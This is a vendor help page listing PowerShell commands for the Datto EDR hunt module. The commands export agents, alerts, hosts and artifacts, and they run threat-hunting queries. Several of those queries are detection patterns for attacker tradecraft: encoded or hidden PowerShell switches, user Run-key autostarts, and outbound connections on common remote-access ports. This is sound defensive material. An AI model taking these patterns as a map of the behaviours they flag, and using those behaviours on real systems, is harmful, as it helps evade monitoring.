PowerShell Command List

Environment

Datto EDR

Description

Commands

Data Type	Command	Description
Agents	Stop-Service -Name HUNTAgent; Start-Sleep -Seconds 5; Start-Service -Name HUNTAgent	Restart the Datto Endpoint Security Agent
Agents	Get-ICAgent -NoLimit \| export-csv <MYCSVFILE>.csv -notypeinformation -noclobber	Export list of ALL Agents
Alerts	Get-ICAlert -NoLimit -where @{Threat="bad"} \| Export-CSV <TEST>.csv -notypeinformation -noclobber	Gets all alerts that are defined as bad and exports the results to a CSV
Analyze	Set-ICBox -id <8d908c82-6f96-4064-aa89-534f47da321a> Get-ICObject -type Host -where @{failed=$false} -nolimit \| Export-CSV <mycsv>.csv -notypeinformation -noclobber	Will download CSV of all Host that have been scanned. Make sure to set id based on what view you're looking for. (ie. Global last 7, 30, 90)
Analyze	Get-ICAPI -endpoint hostscans -where @{failed=$false}\|measure	Gets a list of Scanned Hosts (change Failed=True for failed scans)
Analyze	Get-icobject -type file -nolimit -allinstances -where @{"localBlacklist" = "True"} \|Export-CSV <ENTERFILEPATH/FILENAME>.csv -noclobber	Get ALL Objects that have been Flagged/Blacklisted. By HOST. (Set ICBox first)
Applications	Get-ICObject -type Application -NoLimit \| export-csv <FILENAME>.csv -notypeinformation -noclobber	Export list of ALL Applications from Analyze Tab
Artifacts	get-icapi -endpoint artifactdetails -nolimit \| export-csv <ENTERFILEPATH/FILENAME>.csv -notypeinformation -noclobber	Exports a CSV of All Artifacts
Extension	Import-ICOfficialExtensions -update	Update and Import OFFICIAL extensions from our GitHub repository
Extension	Get-ICObject -type extension -nolimit -allinstances -where @{"name" = "<extension name>"} \|Export-Csv <full path and filename.csv> -noclobber	Get Extension results with Details
Hash	Get-FileHash <filepath> -Algorithm MD5	Get MD5 Hash for a file
Hash	Get-FileHash <filepath> -Algorithm SHA256	Get SHA256 Hash for a file
Hash	Get-ICFileDetail -sha1 <b09510797878c54a0c4b163d7d6201cc34065ae0>	Gets File Reputation data on a specific SHA1 hash (AV data, signed?, etc.)
Host	Get-ICAddress -NoLimit \| export-csv FILENAME.csv -notypeinformation -noclobber	Will download CSV of all Hosts from Discover Tab
Host	get-icaddress -TargetGroupId <39d4e412-6567-4da2-875e-4991796a5acf> -nolimit \| export-csv C:\<pathname\filename>.csv	Gets all host data for a specific target group
Hosts	Get-ICObject -type Host -where @{failed=$false} -nolimit \| Export-CSV <FILENAME>.csv -notypeinformation -noclobber	Gets all hosts where scans succeeded
Object	Get-ICObject -Type Connection -where @{remotePort=3389}	Gets all TCP Connections on port 3389, all outgoing RDP traffic
Target Group	Set-ICBox -id $((Get-ICBox -targetGroupId $((Get-ICTargetGroup -where @{name="TARGETGROUPNAME"}).id) -Last90).id) -Verbose Get-ICAPI -endpoint boxArtifactDetails -where @{boxId=$ICCurrentBox} \| export-csv <ENTERFILEPATH/FILENAME>.csv -notypeinformation -noclobber	Target Group specifid CSV download
Target Group	Get-ICTargetGroup -where @{"name" = "<target group name>"}	Retrieves a specific Target Group based off of the where clause
Target Group	(get-icaddress).targetId \| sort \| get-unique	Gets all unique target group ID's within the instance
Target Group	Get-ICTargetGroup -nolimit \|Export-Csv C:\<File Path\FileName>.csv -noclobber	Report of all target groups extracted as CSV.
Timeframe	set-ICBox -id $((Get-ICBox -global -Last90).id)	To set timeframe
Analyze	Get-ICObject -Type Process -AllInstances -where @{ name = "powershell.exe"; commandLine = @{ regexp = "-" }} -fields hostname, name, path, commandLine, scannedOn \| Sort-Object commandLine \| where { $_.commandLine -match "-enc\|hidden" } \| select hostname, commandline	Shows hidden command-line switches. Used when hunting for PowerShell
Analyze	Get-ICObject -Type Autostart -AllInstances -fields hostname, autostartType, regPath, value, path, scannedOn \| Sort-Object value -Unique \| fl hostname, autostartType, path, value	Retrieves all autostarts gives the values hostname, austostartType, path, and value. Used when hunting for Autostarts.
Analyze	Get-ICObject -Type Autostart -AllInstances -fields hostname, autostartType, regPath, value, path, scannedOn -where @{ path = @{ regexp = "users"; autostartType = âRun Keyâ; value = @{ regexp = "-"}}} \| Sort-Object value -Unique	Gets all autostarts but Filters on Run Keys in Users folders with a command line switch (-) in the value
Analyze	$where = @{ and = @( @{ processName = @{ regexp = "^((?!infocyte).)*$"}}, @{ processId = @{neq = $null}}, @{ remoteAddrString = @{ neq="127.0.0.1"}}, @{ remoteAddrString = @{ neq="0.0.0.0"}}, @{ remotePortString = @{ regexp = "^21$\|^22$\|^80$\|^443$\|^135$\|^139$\|^445$\|^3389$\|^8080$" }} ) } Get-ICObject -Type Connection -AllInstances -where $where -fields hostname, processId, proto, localAddr, localPort, processPath, processName, remoteAddr, remotePort, state	Lists outbound, non-loopback connections on several key ports
Analyze	$where = @{ and = @( @{ processName = "powershell.exe"}, @{ processId = @{neq = $null}} ) } Get-ICObject -Type Connection -AllInstances -where $where -fields hostname, processId, proto, localAddr, localPort, processPath, processName, remoteAddr, remotePort, state	Lists connections associated with PowerShell

Please refer to our Datto EDR Hunt API PowerShell Module Guide article if you need help getting started.

	Need troubleshooting help? Open the Kaseya Helpdesk.
	Want to talk about it? Head on over to the Community!
	Have an idea for a new feature? Want to learn about upcoming enhancements? Visit the Ideas forum!
	Provide feedback for the Documentation team.